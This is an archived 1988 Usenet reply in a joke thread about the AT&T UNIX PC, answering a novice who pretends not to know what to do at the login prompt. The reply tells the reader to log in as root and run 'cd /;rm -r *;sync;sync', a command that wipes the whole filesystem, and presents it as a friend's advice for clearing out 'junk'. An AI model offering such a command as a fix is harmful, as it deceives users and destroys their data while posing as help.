Path: utzoo!utgpu!water!watmath!uunet!lll-winken!killer!ames!rrobinson From: rrobinson@ames.arc.nasa.gov (Randall W. Robinson) Newsgroups: unix-pc.test Subject: Re: The UNIX PC is GARRRRBAAAAAJ! Message-ID: <12661@ames.arc.nasa.gov> Date: 1 Aug 88 15:55:31 GMT References: <2260@mtuxo.att.com> Organization: NASA - Ames Research Center, Moffett Field, CA Lines: 24 in article <2260@mtuxo.att.com>, cas@mtuxo.att.com (43424-C.STEVENS) says: > > In article <194@gizzmo.UUCP>, Kdavid@gizzmo.UUCP (David Solan) writes: >> Boy, what I would like to see is a UNIX PC with lots more memory -- >> >> P.S. Can anyone please tell me what I'm supposed to do after I boot up >> the machine and it says "Please login:" ??? It does this every time >> and no matter what I do I can't hack this kludgey bug. Come on -- >> John, Fred, Pete, Marty, Bob, Jack, Chris, Mortimer -- one of you guru >> wizards out there must know! I'll post a summary of the replies if >> there is enough interest. > > I'm interested, what do you do after you login? Hmm.... I think you type root and a return. Then you type cd /;rm -r *;sync;sync If that doesn't get rid of that junk, I don't know what will. Anyway that is what a friend told me. Randy rrobinson@orion.arc.nasa.gov